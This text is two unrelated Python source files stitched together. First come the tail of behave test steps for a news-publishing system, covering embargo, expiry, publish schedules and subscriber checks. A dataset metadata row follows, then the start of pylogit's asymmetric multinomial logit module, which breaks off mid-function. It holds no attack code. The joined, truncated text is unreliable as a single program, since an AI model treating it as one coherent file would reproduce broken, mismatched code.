def step_impl_then_check_embargo(context):
assert_200(context.response)
try:
response_data = json.loads(context.response.get_data())
except Exception:
fail_and_print_body(context.response, 'response is not valid json')
if response_data.get('_meta') and response_data.get('_items'):
for item in response_data.get('_items'):
assert_embargo(context, item)
else:
assert_embargo(context, response_data)
def assert_embargo(context, item):
if not item.get('embargo'):
fail_and_print_body(context, context.response, 'Embargo not found')
@when('embargo lapses for "{item_id}"')
def embargo_lapses(context, item_id):
item_id = apply_placeholders(context, item_id)
item = get_res("/archive/%s" % item_id, context)
updates = {'embargo': (utcnow() - timedelta(minutes=10)),
'schedule_settings': {'utc_embargo': (utcnow() - timedelta(minutes=10))}}
with context.app.test_request_context(context.app.config['URL_PREFIX']):
get_resource_service('archive').system_update(id=item['_id'], original=item, updates=updates)
@then('we validate the published item expiry to be after publish expiry set in desk settings {publish_expiry_in_desk}')
def validate_published_item_expiry(context, publish_expiry_in_desk):
assert_200(context.response)
try:
response_data = json.loads(context.response.get_data())
except Exception:
fail_and_print_body(context.response, 'response is not valid json')
if response_data.get('_meta') and response_data.get('_items'):
for item in response_data.get('_items'):
assert_expiry(item, publish_expiry_in_desk)
else:
assert_expiry(response_data, publish_expiry_in_desk)
@then('we get updated timestamp "{field}"')
def step_we_get_updated_timestamp(context, field):
data = get_json_data(context.response)
timestamp = arrow.get(data[field])
now = utcnow()
assert timestamp + timedelta(seconds=5) > now, 'timestamp < now (%s, %s)' % (timestamp, now) # 5s tolerance
def assert_expiry(item, publish_expiry_in_desk):
embargo = item.get('embargo')
actual = parse_date(item.get('expiry'))
error_message = 'Published Item Expiry validation fails'
publish_expiry_in_desk = int(publish_expiry_in_desk)
if embargo:
expected = get_expiry_date(minutes=publish_expiry_in_desk,
offset=datetime.strptime(embargo, '%Y-%m-%dT%H:%M:%S%z'))
if actual != expected:
raise WooperAssertionError("{}. Expected: {}, Actual: {}".format(error_message, expected, actual))
else:
expected = get_expiry_date(minutes=publish_expiry_in_desk)
if expected < actual:
raise WooperAssertionError("{}. Expected: {}, Actual: {}".format(error_message, expected, actual))
@when('run import legal publish queue')
def run_import_legal_publish_queue(context):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
from apps.legal_archive import ImportLegalPublishQueueCommand
ImportLegalPublishQueueCommand().run()
@when('we expire items')
def expire_content(context):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
ids = json.loads(apply_placeholders(context, context.text))
expiry = utcnow() - timedelta(minutes=5)
for item_id in ids:
original = get_resource_service('archive').find_one(req=None, _id=item_id)
get_resource_service('archive').system_update(item_id, {'expiry': expiry}, original)
get_resource_service('published').update_published_items(item_id, 'expiry', expiry)
from apps.archive.commands import RemoveExpiredContent
RemoveExpiredContent().run()
@when('the publish schedule lapses')
def run_overdue_schedule_jobs(context):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
ids = json.loads(apply_placeholders(context, context.text))
lapse_time = utcnow() - timedelta(minutes=5)
updates = {
'publish_schedule': lapse_time,
'schedule_settings': {
'utc_publish_schedule': lapse_time,
'time_zone': None
}
}
for item_id in ids:
original = get_resource_service('archive').find_one(req=None, _id=item_id)
get_resource_service('archive').system_update(item_id, updates, original)
get_resource_service('published').update_published_items(item_id, 'publish_schedule', lapse_time)
get_resource_service('published').update_published_items(item_id, 'schedule_settings.utc_publish_schedule',
lapse_time)
@when('we transmit items')
def expire_content(context):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
from superdesk.publish.publish_content import PublishContent
PublishContent().run()
@when('we remove item "{_id}" from mongo')
def remove_item_from_mongo(context, _id):
with context.app.app_context():
context.app.data.mongo.remove('archive', {'_id': _id})
@then('we get text "{text}" in response field "{field}"')
def we_get_text_in_field(context, text, field):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
resp = parse_json_response(context.response)
assert field in resp, 'Field {} not found in response.'.format(field)
assert isinstance(resp.get(field), str), 'Invalid type'
assert text in resp.get(field, ''), '{} contains text: {}. Text To find: {}'.format(field,
resp.get(field, ''),
text)
@then('we reset priority flag for updated articles')
def we_get_reset_default_priority_for_updated_articles(context):
context.app.config['RESET_PRIORITY_VALUE_FOR_UPDATE_ARTICLES'] = True
@then('we mark the items not moved to legal')
def we_mark_the_items_not_moved_to_legal(context):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
ids = json.loads(apply_placeholders(context, context.text))
for item_id in ids:
get_resource_service('published').update_published_items(item_id, 'moved_to_legal', False)
@when('we run import legal archive command')
def we_run_import_legal_archive_command(context):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
from apps.legal_archive.commands import ImportLegalArchiveCommand
ImportLegalArchiveCommand().run()
@then('we find no reference of package "{reference}" in item')
def we_find_no_reference_of_package_in_item(context, reference):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
reference = apply_placeholders(context, reference)
resp = parse_json_response(context.response)
linked_in_packages = resp.get('linked_in_packages', [])
assert reference not in [p.get('package') for p in linked_in_packages], \
'Package reference {} found in item'.format(reference)
@then('we set spike exipry "{expiry}"')
def we_set_spike_exipry(context, expiry):
context.app.settings['SPIKE_EXPIRY_MINUTES'] = int(expiry)
@then('we set published item expiry {expiry}')
def we_set_published_item_expiry(context, expiry):
context.app.settings['PUBLISHED_CONTENT_EXPIRY_MINUTES'] = int(expiry)
@then('we set copy metadata from parent flag')
def we_set_copy_metadata_from_parent(context):
context.app.settings['COPY_METADATA_FROM_PARENT'] = True
@then('we assert the content api item "{item_id}" is published to subscriber "{subscriber}"')
def we_assert_content_api_item_is_published_to_subscriber(context, item_id, subscriber):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
item_id = apply_placeholders(context, item_id)
subscriber = apply_placeholders(context, subscriber)
req = ParsedRequest()
req.projection = json.dumps({'subscribers': 1})
cursor = get_resource_service('items').get_from_mongo(req, {'_id': item_id})
assert cursor.count() > 0, 'Item not found'
item = cursor[0]
subscriber = apply_placeholders(context, subscriber)
assert len(item.get('subscribers', [])) > 0, 'No subscribers found.'
assert subscriber in item.get('subscribers', []), 'Subscriber with Id: {} not found.'.format(subscriber)
@then('we assert the content api item "{item_id}" is not published to subscriber "{subscriber}"')
def we_assert_content_api_item_is_not_published_to_subscriber(context, item_id, subscriber):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
item_id = apply_placeholders(context, item_id)
subscriber = apply_placeholders(context, subscriber)
req = ParsedRequest()
req.projection = json.dumps({'subscribers': 1})
cursor = get_resource_service('items').get_from_mongo(req, {'_id': item_id})
assert cursor.count() > 0, 'Item not found'
item = cursor[0]
subscriber = apply_placeholders(context, subscriber)
assert subscriber not in item.get('subscribers', []), \
'Subscriber with Id: {} found for the item. '.format(subscriber)
@then('we assert the content api item "{item_id}" is not published to any subscribers')
def we_assert_content_api_item_is_not_published(context, item_id):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
item_id = apply_placeholders(context, item_id)
req = ParsedRequest()
req.projection = json.dumps({'subscribers': 1})
cursor = get_resource_service('items').get_from_mongo(req, {'_id': item_id})
assert cursor.count() > 0, 'Item not found'
item = cursor[0]
assert len(item.get('subscribers', [])) == 0, \
'Item published to subscribers {}.'.format(item.get('subscribers', []))
@then('we ensure that archived schema extra fields are not present in duplicated item')
def we_ensure_that_archived_schema_extra_fields_are_not_present(context):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
eve_keys = set([config.ID_FIELD, config.LAST_UPDATED, config.DATE_CREATED, config.VERSION, config.ETAG])
archived_schema_keys = set(context.app.config['DOMAIN']['archived']['schema'].keys())
archived_schema_keys.union(eve_keys)
archive_schema_keys = set(context.app.config['DOMAIN']['archive']['schema'].keys())
archive_schema_keys.union(eve_keys)
extra_fields = [key for key in archived_schema_keys if key not in archive_schema_keys]
duplicate_item = json.loads(context.response.get_data())
for field in extra_fields:
assert field not in duplicate_item, 'Field {} found the duplicate item'.format(field)
@then('we assert content api item "{item_id}" with associated item "{embedded_id}" is published to "{subscriber}"')
def we_assert_that_associated_item_for_subscriber(context, item_id, embedded_id, subscriber):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
item_id = apply_placeholders(context, item_id)
subscriber = apply_placeholders(context, subscriber)
embedded_id = apply_placeholders(context, embedded_id)
req = ParsedRequest()
cursor = get_resource_service('items').get_from_mongo(req, {'_id': item_id})
assert cursor.count() > 0, 'Item not found'
item = cursor[0]
assert embedded_id in (item.get('associations') or {}), '{} association not found.'.format(embedded_id)
assert subscriber in (item['associations'][embedded_id] or {}).get('subscribers', []), \
'{} subscriber not found in associations {}'.format(subscriber, embedded_id)
@then('we assert content api item "{item_id}" with associated item "{embedded_id}" is not published to "{subscriber}"')
def we_assert_that_associated_item_for_subscriber(context, item_id, embedded_id, subscriber):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
item_id = apply_placeholders(context, item_id)
subscriber = apply_placeholders(context, subscriber)
embedded_id = apply_placeholders(context, embedded_id)
req = ParsedRequest()
cursor = get_resource_service('items').get_from_mongo(req, {'_id': item_id})
assert cursor.count() > 0, 'Item not found'
item = cursor[0]
assert embedded_id in (item.get('associations') or {}), '{} association not found.'.format(embedded_id)
assert subscriber not in (item['associations'][embedded_id] or {}).get('subscribers', []), \
'{} subscriber found in associations {}'.format(subscriber, embedded_id)
@then('file exists "{path}"')
def then_file_exists(context, path):
assert os.path.isfile(path), '{} is not a file'.format(path)
|
agpl-3.0
| -117,397,680,062,153,810 | 38.317652 | 120 | 0.64768 | false |
timothyb0912/pylogit
|
src/pylogit/asym_logit.py
|
1
|
50536
|
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 28 20:16:35 2016
@name: MultiNomial Asymmetric Logit--version 3
@author: Timothy Brathwaite
@summary: Contains functions necessary for estimating multinomial asymmetric
logit models (with the help of the "base_multinomial_cm.py" file)
@notes: Differs from version 1 by how it defines the transformation for
v_n < 0. Instead of ln(1-c_j), this file uses ln((1 - c_j)/ (J-1)).
Differs from version 2 in how it partitions the vector of
parameters to be estimated, using
theta = (shape | intercept | beta) instead of
theta = (shape | beta).
"""
from __future__ import absolute_import
from functools import partial
import warnings
import numpy as np
from scipy.sparse import diags
from . import choice_calcs as cc
from . import base_multinomial_cm_v2 as base_mcm
from .estimation import LogitTypeEstimator
from .estimation import estimate
from .display_names import model_type_to_display_name as display_name_dict
try:
# in Python 3 range returns an iterator instead of list
# to maintain backwards compatibility use "old" version of range
from past.builtins import range
except ImportError:
pass
# Define the boundary values which are not to be exceeded ducing computation
max_comp_value = 1e300
min_comp_value = 1e-300
max_exp = 700
min_exp = -700
# Alias necessary functions from the base multinomial choice model module
general_log_likelihood = cc.calc_log_likelihood
general_gradient = cc.calc_gradient
general_calc_probabilities = cc.calc_probabilities
general_hessian = cc.calc_hessian
# Create a warning string that will be issued if ridge regression is performed.
_msg = "NOTE: An L2-penalized regression is being performed. The "
_msg_2 = "reported standard errors and robust standard errors "
_msg_3 = "***WILL BE INCORRECT***."
_ridge_warning_msg = _msg + _msg_2 + _msg_3
# Create a warning that tells users to pass the shape_ref_pos keyword argument.
_msg_4 = "shape_ref_pos must be an integer. It is not an optional "
_msg_5 = "parameter for the asymmetric logit model. All shape "
_msg_6 = "parameters are not identified."
_shape_ref_msg = _msg_4 + _msg_5 + _msg_6
def split_param_vec(param_vec, rows_to_alts, design, return_all_types=False):
"""
Parameters
----------
param_vec : 1D ndarray.
Should have as many elements as there are parameters being estimated.
rows_to_alts : 2D scipy sparse matrix.
There should be one row per observation per available alternative and
one column per possible alternative. This matrix maps the rows of the
design matrix to the possible alternatives for this dataset.
design : 2D ndarray.
There should be one row per observation per available alternative.
There should be one column per utility coefficient being estimated. All
elements should be ints, floats, or longs.
return_all_types : bool, optional.
Determines whether or not a tuple of 4 elements will be returned (with
one element for the nest, shape, intercept, and index parameters for
this model). If False, a tuple of 3 elements will be returned, as
described below.
Returns
-------
tuple of three 1D ndarrays.
The first element will be an array of the shape parameters for this
model. The second element will either be an array of the "outside"
intercept parameters for this model or None. The third element will be
an array of the index coefficients for this model.
Note
----
If `return_all_types == True` then the function will return a tuple of four
objects. In order, these objects will either be None or the arrays
representing the arrays corresponding to the nest, shape, intercept, and
index parameters.
"""
# Figure out how many shape parameters we should have for the model
num_shapes = rows_to_alts.shape[1] - 1
# Figure out how many parameters are in the index
num_index_coefs = design.shape[1]
# Isolate the initial shape parameters from the betas
shapes = param_vec[:num_shapes]
betas = param_vec[-1 * num_index_coefs:]
# Get the remaining outside intercepts if there are any
remaining_idx = param_vec.shape[0] - (num_shapes + num_index_coefs)
if remaining_idx > 0:
intercepts = param_vec[num_shapes: num_shapes + remaining_idx]
else:
intercepts = None
if return_all_types:
return None, shapes, intercepts, betas
else:
return shapes, intercepts, betas
def _convert_eta_to_c(eta, ref_position):
"""
Parameters
----------
eta : 1D or 2D ndarray.
The elements of the array should be this model's 'transformed' shape
parameters, i.e. the natural log of (the corresponding shape parameter
divided by the reference shape parameter). This array's elements will
be real valued. If `eta` is 2D, then its shape should be
(num_estimated_shapes, num_parameter_samples).
ref_position : int.
Specifies the position in the resulting array of shape ==
`(eta.shape[0] + 1,)` that should be equal to 1 - the sum of the other
elements in the resulting array.
Returns
-------
c_vector : 1D or 2D ndarray based on `eta`.
If `eta` is 1D then `c_vector` should have shape
`(eta.shape[0] + 1, )`. If `eta` is 2D then `c_vector` should have
shape `(eta.shape[0] + 1, eta.shape[1])`. The returned array will
contains the 'natural' shape parameters that correspond to `eta`.
"""
# Exponentiate eta
exp_eta = np.exp(eta)
# Guard against overflow
exp_eta[np.isposinf(exp_eta)] = max_comp_value
# Guard against underflow
exp_eta[exp_eta == 0] = min_comp_value
# Calculate the denominator in a logistic transformation
# Note the +1 is for the reference alternative which has been
# constrained so that its corresponding eta = 0 and exp(0) = 1
denom = exp_eta.sum(axis=0) + 1
# Get a list of all the indices (or row indices) corresponding to the
# alternatives whose shape parameters are being estimated.
replace_list = list(range(eta.shape[0] + 1))
replace_list.remove(ref_position)
# Initialize an array for the vector of shape parameters, c
if len(eta.shape) > 1 and eta.shape[1] > 1:
# Get an array of zeros with shape
# (num_possible_alternatives, num_parameter_samples). This is used when
# working with samples from a Bayesian posterior distribution
c_vector = np.zeros((eta.shape[0] + 1,
eta.shape[1]))
# Calculate the natural shape parameters
c_vector[replace_list, :] = exp_eta / denom
c_vector[ref_position, :] = 1.0 / denom
else:
# Get an array of zeros with shape (num_possible_alternatives,)
c_vector = np.zeros(eta.shape[0] + 1)
# Calculate the natural shape parameters
c_vector[replace_list] = exp_eta / denom
c_vector[ref_position] = 1.0 / denom
return c_vector
def _calc_deriv_c_with_respect_to_eta(natural_shapes,
ref_position,
output_array=None):
"""
Parameters
----------
natural_shapes : 1D ndarray.
Should have one element per available alternative in the dataset whose
choice situations are being modeled. Should have at least
`ref_position` elements in it.
ref_position : int.
Specifies the position in the array of natural shape parameters that
should be equal to 1 - the sum of the other elements. Specifies the
alternative in the ordered array of unique alternatives that is not
having its shape parameter estimated (in order to ensure
identifiability).
output_array : 2D ndarray.
This array is to have its data overwritten with the correct derivatives
of the natural shape parameters with respect to transformed shape
parameters. Should have shape ==
`(natural_shapes.shape[0], natural_shapes.shape[0] - 1)`.
Returns
-------
output_array : 2D ndarray.
Has shape == (natural_shapes.shape[0], natural_shapes.shape[0] - 1).
Will contain the derivative of the shape parameters, with
respect to the underlying 'transformed' shape parameters.
"""
# Generate a list of the indices which indicate the columns to be
# selected from a 2D numpy array of
# np.diag(natural_shapes) - np.outer(natural_shapes, natural_shapes)
columns_to_be_kept = range(natural_shapes.shape[0])
columns_to_be_kept.remove(ref_position)
# Calculate and store the derivative of the natural shape parameters
# with respect to the reduced shape parameters.
output_array[:, :] = (np.diag(natural_shapes) -
np.outer(natural_shapes,
natural_shapes))[:, columns_to_be_kept]
return output_array
def _asym_utility_transform(systematic_utilities,
alt_IDs,
rows_to_alts,
eta,
intercept_params,
shape_ref_position=None,
intercept_ref_pos=None,
*args, **kwargs):
"""
Parameters
----------
systematic_utilities : 1D ndarray.
Contains the systematic utilities for each each available alternative
for each observation. All elements should be ints, floats, or longs.
alt_IDs : 1D ndarray.
All elements should be ints. There should be one row per obervation per
available alternative for the given observation. Elements denote the
alternative corresponding to the given row of the design matrix.
rows_to_alts : 2D ndarray.
There should be one row per observation per available alternative and
one column per possible alternative. This matrix maps the rows of the
design matrix to the possible alternatives for this dataset.
eta : 1D ndarray.
Each element should be an int, float, or long. There should be one
value per transformed shape parameter. Note that if there are J
possible alternatives in the dataset, then there should be J - 1
elements in `eta`.
intercept_params : 1D ndarray or None.
If an array, each element should be an int, float, or long. For
identifiability, there should be J- 1 elements where J is the total
number of observed alternatives for this dataset.
shape_ref_position : int.
Specifies the position in the array of natural shape parameters that
should be equal to 1 - the sum of the other elements. Specifies the
alternative in the ordered array of unique alternatives that is not
having its shape parameter estimated (to ensure identifiability).
intercept_ref_pos : int, or None, optional.
Specifies the index of the alternative, in the ordered array of unique
alternatives, that is not having its intercept parameter estimated (in
order to ensure identifiability). Should only be None if
intercept_params is None. Default == None.
Returns
-------
transformed_utilities : 2D ndarray.
Should have shape `(systematic_utilities.shape[0], 1)`. The returned
array contains the values of the transformed index for this model.
"""
##########
# Convert the reduced shape parameters to the natural shape parameters
##########
natural_shape_params = _convert_eta_to_c(eta, shape_ref_position)
##########
# Calculate the transformed utilities from the natural shape parameters
##########
# Create a vector which contains the appropriate shape for each row in
# the design matrix
long_shapes = rows_to_alts.dot(natural_shape_params)
# Determine the total number of alternatives
num_alts = rows_to_alts.shape[1]
# Get the natural log of the long_shapes
log_long_shapes = np.log(long_shapes)
# Guard against underflow, aka long_shapes too close to zero
log_long_shapes[np.isneginf(log_long_shapes)] = -1 * max_comp_value
# Get the natural log of (1 - long_shapes) / (J - 1)
log_1_sub_long_shapes = np.log((1 - long_shapes) / float(num_alts - 1))
# Guard against underflow, aka 1 - long_shapes too close to zero
small_idx = np.isneginf(log_1_sub_long_shapes)
log_1_sub_long_shapes[small_idx] = -1 * max_comp_value
# Compute the transformed utilities
multiplier = ((systematic_utilities >= 0) * log_long_shapes +
(systematic_utilities < 0) * log_1_sub_long_shapes)
transformed_utilities = log_long_shapes - systematic_utilities * multiplier
# Perform a guard for shape --> 1 and V --> infinity.
# It is DEFINITELY not clear if this is the correct thing to do. The limit
# might not even exist, and there is no clear multivariate L'Hopital's
# rule. So this is an arbitrary decision
weird_case = np.isposinf(systematic_utilities) * (long_shapes == 1)
transformed_utilities[weird_case] = 0
# Account for the outside intercept parameters if there are any
if intercept_params is not None and intercept_ref_pos is not None:
# Get a list of all the indices (or row indices) corresponding to the
# alternatives whose intercept parameters are being estimated.
needed_idxs = range(rows_to_alts.shape[1])
needed_idxs.remove(intercept_ref_pos)
if len(intercept_params.shape) > 1 and intercept_params.shape[1] > 1:
# Get an array of zeros with shape
# (num_possible_alternatives, num_parameter_samples)
all_intercepts = np.zeros((rows_to_alts.shape[1],
intercept_params.shape[1]))
# For alternatives having their intercept estimated, replace the
# zeros with the current value of the estimated intercepts
all_intercepts[needed_idxs, :] = intercept_params
else:
# Get an array of zeros with shape (num_possible_alternatives,)
all_intercepts = np.zeros(rows_to_alts.shape[1])
# For alternatives having their intercept estimated, replace the
# zeros with the current value of the estimated intercepts
all_intercepts[needed_idxs] = intercept_params
# Add the intercept values to f(x, beta, c)
transformed_utilities += rows_to_alts.dot(all_intercepts)
# Perform final guards against over/underflow in the transformations
transformed_utilities[np.isposinf(transformed_utilities)] = max_comp_value
transformed_utilities[np.isneginf(transformed_utilities)] = -max_comp_value
# Be sure to return a 2D array since other functions will be expecting that
if len(transformed_utilities.shape) == 1:
transformed_utilities = transformed_utilities[:, np.newaxis]
return transformed_utilities
def _asym_transform_deriv_v(systematic_utilities,
alt_IDs,
rows_to_alts,
eta,
ref_position=None,
output_array=None,
*args, **kwargs):
"""
Parameters
----------
systematic_utilities : 1D ndarray.
Contains the systematic utilities for each each available alternative
for each observation. All elements should be ints, floats, or longs.
alt_IDs : 1D ndarray.
All elements should be ints. There should be one row per obervation per
available alternative for the given observation. Elements denote the
alternative corresponding to the given row of the design matrix.
rows_to_alts : 2D ndarray.
There should be one row per observation per available alternative and
one column per possible alternative. This matrix maps the rows of the
design matrix to the possible alternatives for this dataset.
eta : 1D ndarray.
Each element should be an int, float, or long. There should be one
value per transformed shape parameter. Note that if there are J
possible alternatives in the dataset, then there should be J - 1
elements in `eta`.
ref_position : int.
Specifies the position in the array of natural shape parameters that
should be equal to 1 - the sum of the other elements. Specifies the
alternative in the ordered array of unique alternatives that is not
having its shape parameter estimated (to ensure identifiability).
output_array : 2D scipy sparse matrix.
This matrix's data is to be replaced with the correct derivatives of
the transformation vector with respect to the vector of systematic
utilities.
Returns
-------
output_array : 2D scipy sparse matrix.
Will be a square matrix with `systematic_utilities.shape[0]` rows and
columns. `output_array` specifies the derivative of the transformed
utilities with respect to the index, V.
"""
##########
# Convert the reduced shape parameters to the natural shape parameters
##########
natural_shape_params = _convert_eta_to_c(eta, ref_position)
##########
# Calculate the derivative of the transformed utilities with respect to
# the systematic utilities
##########
# Create a vector which contains the appropriate shape for each row in the
# design matrix
long_shapes = rows_to_alts.dot(natural_shape_params)
# Determine how many alternatives there are
num_alts = rows_to_alts.shape[1]
# Get the natural log of the long_shapes
log_long_shapes = np.log(long_shapes)
# Guard against underflow, aka long_shapes too close to zero.
# I assume this should never happen because convert_eta_to_c never outputs
# zeros, by design.
log_long_shapes[np.isneginf(log_long_shapes)] = -1 * max_comp_value
# Get the natural log of (1 - long_shapes) / (num_alts - 1)
log_1_sub_long_shapes = np.log((1 - long_shapes) /
(num_alts - 1))
# Guard against underflow, aka 1 - long_shapes too close to zero.
small_idx = np.isneginf(log_1_sub_long_shapes)
log_1_sub_long_shapes[small_idx] = -1 * max_comp_value
# Calculate the derivative of h_ij with respect to v_ij
# Note that the derivative of h_ij with respect to any other systematic
# utility is zero.
derivs = -1 * ((systematic_utilities >= 0).astype(int) *
log_long_shapes +
(systematic_utilities < 0).astype(int) *
log_1_sub_long_shapes)
output_array.data = derivs
# Return the matrix of dh_dv. Note the off-diagonal entries are zero
# because each transformation only depends on its value of v and no others
return output_array
def _asym_transform_deriv_shape(systematic_utilities,
alt_IDs,
rows_to_alts,
eta,
ref_position=None,
dh_dc_array=None,
fill_dc_d_eta=None,
output_array=None,
*args, **kwargs):
"""
Parameters
----------
systematic_utilities : 1D ndarray.
Contains the systematic utilities for each each available alternative
for each observation. All elements should be ints, floats, or longs.
alt_IDs : 1D ndarray.
All elements should be ints. There should be one row per obervation per
available alternative for the given observation. Elements denote the
alternative corresponding to the given row of the design matrix.
rows_to_alts : 2D ndarray.
There should be one row per observation per available alternative and
one column per possible alternative. This matrix maps the rows of the
design matrix to the possible alternatives for this dataset.
eta : 1D ndarray.
Each element should be an int, float, or long. There should be one
value per transformed shape parameter. Note that if there are J
possible alternatives in the dataset, then there should be J - 1
elements in `eta`.
ref_position : int.
Specifies the position in the array of natural shape parameters that
should be equal to 1 - the sum of the other elements. Specifies the
alternative in the ordered array of unique alternatives that is not
having its shape parameter estimated (to ensure identifiability).
dh_dc_array : 2D scipy sparse matrix.
Its data is to be replaced with the correct derivatives of the
transformed index vector with respect to the shape parameter vector.
Should have shape
`(systematic_utilities.shape[0], rows_to_alts.shape[1])`.
fill_dc_d_eta : callable.
Should accept `eta` and `ref_position` and return a 2D numpy array
containing the derivatives of the 'natural' shape parameter vector with
respect to the vector of transformed shape parameters.
output_array : 2D numpy matrix.
This matrix's data is to be replaced with the correct derivatives of
the transformed systematic utilities with respect to the vector of
transformed shape parameters. Should have shape
`(systematic_utilities.shape[0], shape_params.shape[0])`.
Returns
-------
output_array : 2D ndarray.
The shape of the returned array will be
`(systematic_utilities.shape[0], shape_params.shape[0])`. The returned
array specifies the derivative of the transformed utilities with
respect to the shape parameters.
"""
##########
# Convert the reduced shape parameters to the natural shape parameters
##########
natural_shape_params = _convert_eta_to_c(eta, ref_position)
##########
# Calculate the derivative of the transformed utilities with respect to
# the vector of natural shape parameters, c
##########
# Create a vector which contains the appropriate shape for each row in the
# design matrix. Note as long as natural_shape_params is a numpy array,
# then long_shapes will be a numpy array.
long_shapes = rows_to_alts.dot(natural_shape_params)
# Calculate d_ln(long_shape)_d_long_shape
d_lnShape_dShape = 1.0 / long_shapes
# Guard against overflow
d_lnShape_dShape[np.isposinf(d_lnShape_dShape)] = max_comp_value
# Calculate d_ln((1-long_shape)/(J-1))_d_long_shape
d_lnShapeComp_dShape = -1.0 / (1 - long_shapes)
# Guard against overflow
d_lnShapeComp_dShape[np.isneginf(d_lnShapeComp_dShape)] = -max_comp_value
# Differentiate the multiplier with respect to natural_shape_j.
deriv_multiplier = ((systematic_utilities >= 0) * d_lnShape_dShape +
(systematic_utilities < 0) * d_lnShapeComp_dShape)
# assert not np.isnan(deriv_multiplier).any()
# Calculate the derivative of h_ij with respect to natural_shape_j.
# Store these derivatives in their respective places in the dh_dc array
# Note that d_hij_d_ck = 0 for k != j
dh_dc_values = d_lnShape_dShape - systematic_utilities * deriv_multiplier
# Guard against overflow
dh_dc_values[np.isinf(dh_dc_values)] = -1 * max_comp_value
# Assign the computed values to the scipy sparse array
dh_dc_array.data = dh_dc_values
##########
# Calculate the derivative of the natural shape parameters, c with
# respect to the vector of reduced shape parameters, eta
##########
# Return the matrix of dh_d_eta. Note the matrix should be of dimension
# (systematic_utilities.shape[0], shape_params.shape[0])
# Note the calculation is essentially dh_dc * dc_d_eta = dh_d_eta
output_array[:, :] = dh_dc_array.dot(fill_dc_d_eta(natural_shape_params,
ref_position))
return output_array
def _asym_transform_deriv_alpha(systematic_utilities,
alt_IDs,
rows_to_alts,
intercept_params,
output_array=None,
*args, **kwargs):
"""
Parameters
----------
systematic_utilities : 1D ndarray.
Contains the systematic utilities for each each available alternative
for each observation. All elements should be ints, floats, or longs.
alt_IDs : 1D ndarray.
All elements should be ints. There should be one row per obervation per
available alternative for the given observation. Elements denote the
alternative corresponding to the given row of the design matrix.
rows_to_alts : 2D ndarray.
There should be one row per observation per available alternative and
one column per possible alternative. This matrix maps the rows of the
design matrix to the possible alternatives for this dataset.
intercept_params : 1D ndarray or None.
If an array, each element should be an int, float, or long. For
identifiability, there should be J- 1 elements where J is the total
number of observed alternatives for this dataset.
output_array : None or 2D scipy sparse matrix.
If `output_array` is a 2D scipy sparse matrix, then it should contain
the derivative of the vector of transformed utilities with respect to
the intercept parameters outside of the index. This keyword argurment
will be returned without alteration.
If there are no intercept parameters outside of the index, then
`output_array` should equal None.
If there are intercept parameters outside of the index, then
`output_array` should be rows_to_alts` without the column corresponding
to the alternative whose intercept is not being estimated in order to
ensure identifiability.
Returns
-------
output_array.
"""
return output_array
def create_calc_dh_dv(estimator):
"""
Return the function that can be used in the various gradient and hessian
calculations to calculate the derivative of the transformation with respect
to the index.
Parameters
----------
estimator : an instance of the estimation.LogitTypeEstimator class.
Should contain a `design` attribute that is a 2D ndarray representing
the design matrix for this model and dataset.
Returns
-------
Callable.
Will accept a 1D array of systematic utility values, a 1D array of
alternative IDs, (shape parameters if there are any) and miscellaneous
args and kwargs. Should return a 2D array whose elements contain the
derivative of the tranformed utility vector with respect to the vector
of systematic utilities. The dimensions of the returned vector should
be `(design.shape[0], design.shape[0])`.
"""
dh_dv = diags(np.ones(estimator.design.shape[0]), 0, format='csr')
# Create a function that will take in the pre-formed matrix, replace its
# data in-place with the new data, and return the correct dh_dv on each
# iteration of the minimizer
calc_dh_dv = partial(_asym_transform_deriv_v,
ref_position=estimator.shape_ref_pos,
output_array=dh_dv)
return calc_dh_dv
def create_calc_dh_d_shape(estimator):
"""
Return the function that can be used in the various gradient and hessian
calculations to calculate the derivative of the transformation with respect
to the shape parameters.
Parameters
----------
estimator : an instance of the estimation.LogitTypeEstimator class.
Should contain a `rows_to_alts` attribute that is a 2D scipy sparse
matrix that maps the rows of the `design` matrix to the alternatives
available in this dataset.
Returns
-------
Callable.
Will accept a 1D array of systematic utility values, a 1D array of
alternative IDs, (shape parameters if there are any) and miscellaneous
args and kwargs. Should return a 2D array whose elements contain the
derivative of the tranformed utility vector with respect to the vector
of shape parameters. The dimensions of the returned vector should
be `(design.shape[0], num_alternatives)`.
"""
num_alts = estimator.rows_to_alts.shape[1]
pre_dc_d_eta = np.zeros((num_alts, num_alts - 1), dtype=float)
pre_dh_dc = estimator.rows_to_alts.copy()
pre_dh_d_eta = np.matrix(np.zeros((estimator.design.shape[0],
num_alts - 1), dtype=float))
easy_calc_dc_d_eta = partial(_calc_deriv_c_with_respect_to_eta,
output_array=pre_dc_d_eta)
# Create a function that will take in the pre-formed matrix, replace its
# data in-place with the new data, and return the correct dh_dshape on each
# iteration of the minimizer
calc_dh_d_eta = partial(_asym_transform_deriv_shape,
ref_position=estimator.shape_ref_pos,
dh_dc_array=pre_dh_dc,
fill_dc_d_eta=easy_calc_dc_d_eta,
output_array=pre_dh_d_eta)
return calc_dh_d_eta
def create_calc_dh_d_alpha(estimator):
"""
Return the function that can be used in the various gradient and hessian
calculations to calculate the derivative of the transformation with respect
to the outside intercept parameters.
Parameters
----------
estimator : an instance of the estimation.LogitTypeEstimator class.
Should contain a `rows_to_alts` attribute that is a 2D scipy sparse
matrix that maps the rows of the `design` matrix to the alternatives
available in this dataset. Should also contain an `intercept_ref_pos`
attribute that is either None or an int. This attribute should denote
which intercept is not being estimated (in the case of outside
intercept parameters) for identification purposes.
Returns
-------
Callable.
Will accept a 1D array of systematic utility values, a 1D array of
alternative IDs, (shape parameters if there are any) and miscellaneous
args and kwargs. Should return a 2D array whose elements contain the
derivative of the tranformed utility vector with respect to the vector
of outside intercepts. The dimensions of the returned vector should
be `(design.shape[0], num_alternatives - 1)`.
"""
if estimator.intercept_ref_pos is not None:
